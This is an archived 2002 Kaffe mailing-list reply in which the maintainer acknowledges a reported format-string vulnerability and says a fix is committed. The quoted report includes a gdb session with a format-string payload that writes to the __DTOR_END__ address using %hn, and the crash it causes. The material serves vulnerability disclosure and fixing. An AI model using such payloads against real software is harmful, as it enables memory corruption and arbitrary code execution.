Kaffe Exploit is almost finished... second warning for format strings issue.

Jim Pick kaffe@rufus.w3.org
Fri, 12 Apr 2002 14:20:05 -0700


Oooh, that's bad.

I just committed a fix.  Thanks for the heads up.

Hopefully it shouldn't hurt anyone, since people shouldn't be using Kaffe to
run untrusted code until we've fully implemented things like the verifier.
I'll cc: the list so that people know about this.

Cheers,

 - Jim

----- Original Message -----
From: "KF" <dotslash@snosoft.com>
To: <jim@kaffe.org>
Sent: Friday, April 12, 2002 8:03 AM
Subject: Kaffe Exploit is almost finished... second warning for format
strings issue.


> 0804b6c8 ? __DTOR_END__
> [itchie@ghetto itchie]$ gdb -q /usr/local/libexec/Kaffe
> (gdb) r  AAAABBBB`perl -e 'print
> "\xca\xb6\x04\x08\xc8\xb6\x04\x08"'`EEEE%49131x%26\$hn%16283x%27\$hn
> Starting program: /usr/local/libexec/Kaffe AAAABBBB`perl -e 'print
> "\xca\xb6\x04\x08\xc8\xb6\x04\x08"'`EEEE%49131x%26\$hn%16283x%27\$hn
> java.lang.NoClassDefFoundError: AAAABBBBJHEEEE
>         at java.lang.Class.forName(Class.java:native)
>         at java.lang.Class.forName(Class.java:52)
>
> Program received signal SIGSEGV, Segmentation fault.
> 0xbfffff9a in ?? ()
>
>
> -KF
>
>
>